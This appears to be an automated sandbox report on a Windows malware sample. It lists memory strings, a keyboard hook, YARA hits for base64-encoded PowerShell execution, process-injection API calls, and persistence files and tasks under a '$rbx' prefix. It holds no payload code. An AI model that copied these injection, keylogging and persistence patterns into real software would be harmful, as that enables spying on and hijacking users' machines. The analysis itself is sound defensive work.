Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000007.00000002.2385169405.000001A6A96E0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F2783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000027.00000000.2475625757.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2511424538.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3028177697.00000202C0249000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000027.00000000.2475625757.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2511424538.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3028177697.00000202C0249000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000032.00000002.3031906020.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2477927278.000002A7E2571000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3016592946.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475206356.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.10.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000019.00000002.3053661070.0000016A83A50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.7.dr String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2477927278.000002A7E2571000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6xGa
Source: powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E3703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2385169405.000001A6A96E0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.dr String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Contains functionality to call native functions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B80E0EA NtWriteVirtualMemory, 35_2_00007FFD9B80E0EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B80E112 NtSetContextThread, 35_2_00007FFD9B80E112
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B80E132 NtResumeThread, 35_2_00007FFD9B80E132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B80E0B8 NtUnmapViewOfSection, 35_2_00007FFD9B80E0B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B810FF4 NtResumeThread, 35_2_00007FFD9B810FF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B810F30 NtSetContextThread, 35_2_00007FFD9B810F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B810A4E NtUnmapViewOfSection, 35_2_00007FFD9B810A4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B80E122 NtSetContextThread, 35_2_00007FFD9B80E122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B810C6D NtWriteVirtualMemory, 35_2_00007FFD9B810C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B80E088 NtUnmapViewOfSection, 35_2_00007FFD9B80E088
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 37_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, 38_2_00000225DC642C80
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW, 39_2_00000202C0AE2300
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDF2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, 41_2_000002BAAEDF2C80
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_0000027053062300 NtQuerySystemInformation,StrCmpNIW, 42_2_0000027053062300
Creates files inside the system directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\system32\20241003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\system32\20241003\PowerShell_transcript.745481.0eedoBAF.20241003232435.txt
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-U7ejKPED
Deletes files inside the Windows folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_qh5es4es.ivl.ps1
Detected potential crypto function
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000022123BFCC94 18_3_0000022123BFCC94
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000022123BF23F0 18_3_0000022123BF23F0
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000022123BFCE18 18_3_0000022123BFCE18
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000022123BCCC94 18_3_0000022123BCCC94
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000022123BC23F0 18_3_0000022123BC23F0
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000022123BCCE18 18_3_0000022123BCCE18
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C2D894 18_2_0000022123C2D894
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C22FF0 18_2_0000022123C22FF0
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C2DA18 18_2_0000022123C2DA18
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C5D894 18_2_0000022123C5D894
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C52FF0 18_2_0000022123C52FF0
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C5DA18 18_2_0000022123C5DA18
Source: C:\Windows\System32\conhost.exe Code function: 19_3_0000013F081CCE18 19_3_0000013F081CCE18
Source: C:\Windows\System32\conhost.exe Code function: 19_3_0000013F081C23F0 19_3_0000013F081C23F0
Source: C:\Windows\System32\conhost.exe Code function: 19_3_0000013F081CCC94 19_3_0000013F081CCC94
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E6DA18 19_2_0000013F08E6DA18
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E62FF0 19_2_0000013F08E62FF0
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E6D894 19_2_0000013F08E6D894
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E9DA18 19_2_0000013F08E9DA18
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E92FF0 19_2_0000013F08E92FF0
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E9D894 19_2_0000013F08E9D894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B80DD68 35_2_00007FFD9B80DD68
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFD9B80E339 35_2_00007FFD9B80E339
Source: C:\Windows\System32\conhost.exe Code function: 36_3_000001FD1776CE18 36_3_000001FD1776CE18
Source: C:\Windows\System32\conhost.exe Code function: 36_3_000001FD1776CC94 36_3_000001FD1776CC94
Source: C:\Windows\System32\conhost.exe Code function: 36_3_000001FD177623F0 36_3_000001FD177623F0
Source: C:\Windows\System32\conhost.exe Code function: 36_2_000001FD186D2FF0 36_2_000001FD186D2FF0
Source: C:\Windows\System32\conhost.exe Code function: 36_2_000001FD186DD894 36_2_000001FD186DD894
Source: C:\Windows\System32\conhost.exe Code function: 36_2_000001FD186DDA18 36_2_000001FD186DDA18
Source: C:\Windows\System32\dllhost.exe Code function: 37_3_0000017C6DA823F0 37_3_0000017C6DA823F0
Source: C:\Windows\System32\dllhost.exe Code function: 37_3_0000017C6DA8CE18 37_3_0000017C6DA8CE18
Source: C:\Windows\System32\dllhost.exe Code function: 37_3_0000017C6DA8CC94 37_3_0000017C6DA8CC94
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140001CF0 37_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140002D4C 37_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140003204 37_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140002434 37_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140001274 37_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DAB2FF0 37_2_0000017C6DAB2FF0
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DABDA18 37_2_0000017C6DABDA18
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DABD894 37_2_0000017C6DABD894
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DD72FF0 37_2_0000017C6DD72FF0
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DD7DA18 37_2_0000017C6DD7DA18
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DD7D894 37_2_0000017C6DD7D894
Source: C:\Windows\System32\winlogon.exe Code function: 38_3_00000225DC61CE18 38_3_00000225DC61CE18
Source: C:\Windows\System32\winlogon.exe Code function: 38_3_00000225DC6123F0 38_3_00000225DC6123F0
Source: C:\Windows\System32\winlogon.exe Code function: 38_3_00000225DC61CC94 38_3_00000225DC61CC94
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC64DA18 38_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC642FF0 38_2_00000225DC642FF0
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC64D894 38_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC67DA18 38_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC672FF0 38_2_00000225DC672FF0
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC67D894 38_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe Code function: 39_3_00000202C0ABCE18 39_3_00000202C0ABCE18
Source: C:\Windows\System32\lsass.exe Code function: 39_3_00000202C0ABCC94 39_3_00000202C0ABCC94
Source: C:\Windows\System32\lsass.exe Code function: 39_3_00000202C0AB23F0 39_3_00000202C0AB23F0
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AEDA18 39_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AED894 39_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AE2FF0 39_2_00000202C0AE2FF0
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0B1DA18 39_2_00000202C0B1DA18
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0B1D894 39_2_00000202C0B1D894
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0B12FF0 39_2_00000202C0B12FF0
Source: C:\Windows\System32\svchost.exe Code function: 40_3_000002A6612DCE18 40_3_000002A6612DCE18
Source: C:\Windows\System32\svchost.exe Code function: 40_3_000002A6612D23F0 40_3_000002A6612D23F0
Source: C:\Windows\System32\svchost.exe Code function: 40_3_000002A6612DCC94 40_3_000002A6612DCC94
Source: C:\Windows\System32\svchost.exe Code function: 40_2_000002A66130DA18 40_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe Code function: 40_2_000002A661302FF0 40_2_000002A661302FF0
Source: C:\Windows\System32\svchost.exe Code function: 40_2_000002A66130D894 40_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe Code function: 41_3_000002BAAEDCCE18 41_3_000002BAAEDCCE18
Source: C:\Windows\System32\dwm.exe Code function: 41_3_000002BAAEDC23F0 41_3_000002BAAEDC23F0
Source: C:\Windows\System32\dwm.exe Code function: 41_3_000002BAAEDCCC94 41_3_000002BAAEDCCC94
Source: C:\Windows\System32\dwm.exe Code function: 41_3_000002BAAED9CE18 41_3_000002BAAED9CE18
Source: C:\Windows\System32\dwm.exe Code function: 41_3_000002BAAED923F0 41_3_000002BAAED923F0
Source: C:\Windows\System32\dwm.exe Code function: 41_3_000002BAAED9CC94 41_3_000002BAAED9CC94
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDCDA18 41_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDC2FF0 41_2_000002BAAEDC2FF0
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDCD894 41_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDFDA18 41_2_000002BAAEDFDA18
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDF2FF0 41_2_000002BAAEDF2FF0
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDFD894 41_2_000002BAAEDFD894
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_3_0000027052A123F0 42_3_0000027052A123F0
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_3_0000027052A1CC94 42_3_0000027052A1CC94
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_3_0000027052A1CE18 42_3_0000027052A1CE18
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_0000027053062FF0 42_2_0000027053062FF0
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_000002705306DA18 42_2_000002705306DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_000002705306D894 42_2_000002705306D894
One or more processes crash
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3852 -s 2212
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: unknown Process created: Commandline size = 5571
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682 Jump to behavior
Yara signature match
Source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.49.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.49.dr Binary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.49.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.49.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.49.dr Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engine Classification label: mal100.spyw.evad.winCMD@55/94@1/1
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 37_2_0000000140002D4C
